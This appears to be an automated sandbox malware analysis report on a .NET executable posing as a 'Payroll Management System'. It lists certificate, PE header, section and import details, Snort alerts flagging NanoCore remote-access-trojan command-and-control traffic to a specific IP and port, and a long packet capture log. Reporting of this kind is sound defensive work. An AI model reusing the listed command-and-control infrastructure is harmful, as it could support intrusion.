Signature Issuer:	C=9i1KO9fat1ed1X6, S=2Oc2Y5Yyd396899, L=aade4e1350r4c2a, T=rcf56a519XAM648, E=12e2N595a146006, OU=fD44Es25epaez1d, O=8deA3BO43s5d693, CN=6c307b263c9d46q
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	10/26/2021 1:24:00 PM 10/26/2022 1:24:00 PM
Subject Chain	C=9i1KO9fat1ed1X6, S=2Oc2Y5Yyd396899, L=aade4e1350r4c2a, T=rcf56a519XAM648, E=12e2N595a146006, OU=fD44Es25epaez1d, O=8deA3BO43s5d693, CN=6c307b263c9d46q
Version:	3
Thumbprint MD5:	AB71F36F6594C2F5B3FF9A6EADA2B768
Thumbprint SHA-1:	B823C3EC468CB5EC62FF320B9F99ABC32A5C8DBD
Thumbprint SHA-256:	26E2FC9C3773C42CD9D9C5C25DCE1153C2AE8FBAD50B6ED81DF9514382CF3950
Serial:	00977590AC01D2C59332D212DF1A3B0D16

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2c788	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2e000	0x628	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2b400	0x13b8	.text
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x30000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2a7e4	0x2a800	False	0.326809512868	data	5.25117514356	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x2e000	0x628	0x800	False	0.322265625	data	3.45903901405	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x30000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2e0a0	0x39c	data
RT_MANIFEST	0x2e43c	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2013
Assembly Version	1.0.0.0
InternalName	Payroll Management System.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	Payroll Management System
ProductVersion	1.0.0.0
FileDescription	Payroll Management System
OriginalFilename	Payroll Management System.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/27/21-03:03:12.789428	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	64021	8.8.8.8	192.168.2.3
10/27/21-03:03:13.217886	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49716	8655	192.168.2.3	45.133.1.211
10/27/21-03:03:19.480923	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60784	8.8.8.8	192.168.2.3
10/27/21-03:03:19.528116	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49717	8655	192.168.2.3	45.133.1.211
10/27/21-03:03:27.954322	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49721	8655	192.168.2.3	45.133.1.211
10/27/21-03:03:34.917522	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	52130	8.8.8.8	192.168.2.3
10/27/21-03:03:35.195298	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49724	8655	192.168.2.3	45.133.1.211
10/27/21-03:03:42.169713	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	55102	8.8.8.8	192.168.2.3
10/27/21-03:03:42.273247	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49725	8655	192.168.2.3	45.133.1.211
10/27/21-03:03:48.955141	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56236	8.8.8.8	192.168.2.3
10/27/21-03:03:49.064793	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49726	8655	192.168.2.3	45.133.1.211
10/27/21-03:03:58.273963	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	63297	8.8.8.8	192.168.2.3
10/27/21-03:03:58.302420	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49730	8655	192.168.2.3	45.133.1.211
10/27/21-03:04:05.421907	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49765	8655	192.168.2.3	45.133.1.211
10/27/21-03:04:12.438122	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50585	8.8.8.8	192.168.2.3
10/27/21-03:04:12.470134	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49774	8655	192.168.2.3	45.133.1.211
10/27/21-03:04:20.373141	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	63456	8.8.8.8	192.168.2.3
10/27/21-03:04:20.402976	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49776	8655	192.168.2.3	45.133.1.211
10/27/21-03:04:27.364976	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	58540	8.8.8.8	192.168.2.3
10/27/21-03:04:27.441181	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49793	8655	192.168.2.3	45.133.1.211
10/27/21-03:04:34.892892	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49802	8655	192.168.2.3	45.133.1.211
10/27/21-03:04:41.785895	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49804	8655	192.168.2.3	45.133.1.211
10/27/21-03:04:48.238483	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	49250	8.8.8.8	192.168.2.3
10/27/21-03:04:48.608358	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49805	8655	192.168.2.3	45.133.1.211
10/27/21-03:04:55.682456	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	63490	8.8.8.8	192.168.2.3
10/27/21-03:04:55.712891	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49806	8655	192.168.2.3	45.133.1.211
10/27/21-03:05:02.400161	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49807	8655	192.168.2.3	45.133.1.211
10/27/21-03:05:09.297215	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49808	8655	192.168.2.3	45.133.1.211

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2021 03:03:07.294363022 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:07.294405937 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:07.294522047 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:07.318180084 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:07.318233013 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:07.369452953 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:07.369673967 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:07.380558014 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:07.380573034 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:07.380913019 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:07.420223951 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:07.781847000 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:07.823144913 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.152241945 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.152400970 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.152475119 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.152482033 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.152503967 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.152563095 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.152589083 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.152702093 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.152757883 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.152765036 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.152782917 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.152832031 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.152844906 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.153044939 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.153096914 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.153103113 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.153120995 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.153173923 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.153295040 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.153398037 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.153464079 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.153474092 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.153492928 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.153563023 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.154231071 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.154344082 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.154416084 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.154418945 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.154438972 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.154486895 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.154500961 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.155214071 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.155266047 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.155283928 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.155452013 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.155503035 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.155513048 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.168632984 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.168705940 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.168706894 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.168730021 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.168778896 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.168790102 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.168898106 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.168946028 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.168956041 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.169024944 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.169074059 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.169084072 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.169142962 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.169189930 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.169198990 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.169900894 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.169956923 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.169967890 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.170032024 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.170078993 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.170087099 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.170679092 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.170732021 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.170742989 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.171715021 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.171792984 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.171804905 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.171829939 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.171879053 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.171890974 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.171940088 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.171947956 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.172933102 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.173012972 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.173031092 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.173082113 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.173487902 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.173580885 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.173826933 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.173897028 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.174499989 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.174575090 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.174781084 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.174851894 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.175378084 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.175453901 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.176076889 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.176156044 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.185286045 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.185379028 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.185584068 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.185657978 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.185687065 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.185760975 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.186427116 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.186520100 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.187180996 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.187279940 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.187297106 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.187316895 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.187355995 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.188163996 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.188252926 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.188271046 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.188335896 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.188922882 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.189054966 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.189066887 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.189090967 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.189152956 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.189168930 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.189353943 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.189423084 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.190238953 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.190331936 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.190529108 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.190614939 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.191219091 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.191307068 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.191777945 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.191871881 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.192053080 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.192070007 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.192121983 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.192508936 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.192590952 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.193221092 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.193319082 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.193460941 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.193540096 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.194135904 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.194259882 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.194299936 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.194371939 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.195063114 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.195193052 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.195251942 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.195271015 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.195281982 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.195871115 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.195954084 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.195966959 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.196018934 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.197097063 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.197200060 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.197864056 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.197962999 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.198432922 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.198525906 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.198564053 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.198632002 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.198764086 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.198856115 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.199071884 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.199152946 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.199430943 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.199515104 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.202189922 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.202205896 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.202265024 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.202287912 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.202307940 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.202331066 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.202339888 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.202364922 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.203095913 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.203208923 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.203238964 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.203253984 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.203300953 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.204782009 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.204850912 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.204883099 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.204901934 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.204924107 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.206496000 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.206562042 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.206614017 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.206633091 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.206645966 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.207547903 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.207616091 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.207659006 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.207678080 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.207686901 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.208625078 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.208693981 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.208746910 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.208765030 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.208775043 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.210572004 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.210680008 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.210717916 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.210761070 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.210782051 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.211406946 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.211474895 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.211514950 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.211534977 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.211555958 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.213056087 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.213108063 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.213187933 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.213219881 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.213238001 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.214303970 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.214358091 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.214418888 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.214443922 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.214468002 CEST	49715	443	192.168.2.3	162.159.129.233
Oct 27, 2021 03:03:08.215451956 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.215509892 CEST	443	49715	162.159.129.233	192.168.2.3
Oct 27, 2021 03:03:08.215554953 CEST	49715	443	192.168.2.3	162.159.129.233
